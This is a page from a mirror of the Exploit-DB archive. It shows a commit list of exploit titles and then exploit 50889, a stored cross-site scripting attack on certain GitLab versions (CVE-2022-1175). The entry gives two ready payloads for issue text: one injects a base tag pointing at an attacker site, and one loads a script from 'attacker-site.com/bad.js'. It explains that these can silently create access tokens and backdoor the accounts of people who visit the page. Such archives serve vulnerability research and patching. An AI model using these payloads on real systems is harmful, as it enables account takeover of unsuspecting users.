bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ruby/webapps/50889.txt
Offensive Security be24992411 DB: 2022-05-12 
42 changes to exploits/shellcodes

UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
ExifTool 12.23 - Arbitrary Code Execution
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
Akka HTTP 10.1.14 - Denial of Service
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
Bookeen Notea - Directory Traversal
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
DLINK DIR850 - Insecure Access Control
DLINK DIR850 - Open Redirect
Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
Tenda HG6 v3.3.0 - Remote Command Injection
Google Chrome 78.0.3904.70 - Remote Code Execution
PyScript - Read Remote Python Source Code
DLINK DAP-1620 A1 v1.01 - Directory Traversal
Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
ImpressCMS v1.4.4 - Unrestricted File Upload
Microfinance Management System 1.0 - 'customer_number' SQLi
WebTareas 2.4 - Blind SQLi (Authenticated)
WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
Magento eCommerce CE v2.3.5-p2 - Blind SQLi
Bitrix24 - Remote Code Execution (RCE) (Authenticated)
CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
e107 CMS v3.2.1 - Multiple Vulnerabilities
Anuko Time Tracker - SQLi (Authenticated)
TLR-2005KSH - Arbitrary File Upload
Explore CMS 1.0 - SQL Injection
Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)
Beehive Forum - Account Takeover
MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Joomla Plugin SexyPolling 2.1.7 - SQLi
WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
2022-05-12 05:01:39 +00:00

19 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

# Exploit Title: Gitlab Stored XSS
# Date: 12/04/2022
# Exploit Authors: Greenwolf
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1175
# References: https://github.com/Greenwolf/CVE-2022-1175
Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.
Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
Standard script include also works depending on the sites CSP policy. This is more stealthy.
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>
Reference in a new issue View git blame Copy permalink